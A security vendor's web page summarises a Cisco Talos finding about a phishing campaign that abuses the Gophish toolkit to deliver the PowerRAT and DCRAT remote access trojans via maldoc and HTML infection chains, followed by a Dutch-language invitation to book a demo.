Cert2Connect

Threat actor abuses Gophish to deliver new PowerRAT and DCRAT

Cisco Talos recently discovered a phishing campaign using an open-source phishing toolkit called Gophish by an unknown threat actor. The campaign involves modular infection chains that are either Maldoc or HTML-based infections and require the victims intervention to trigger the infection chain. Talos discovered an undocumented PowerShell RAT were calling PowerRAT as one of the payloads and another infamous Remote Access Tool (RAT) DCRAT. Cisco found a few placeholders for base64 encoded PowerShell scripts in the PowerRAT indicating that the threat actor is actively developing their tools.
Overview

WILT U WETEN HOE DIT RISICO
UITGEBANNEN KAN WORDEN?

Wij helpen je graag. Indien gewenst geven we graag een presentatie of demo van onze oplossingsaanpak. Je vindt ons ook regelmatig op beurzen en events. Volg de evenementenpagina op deze site of meld je aan via de contactpagina voor onze nieuwsbrief.

Maak een afspraak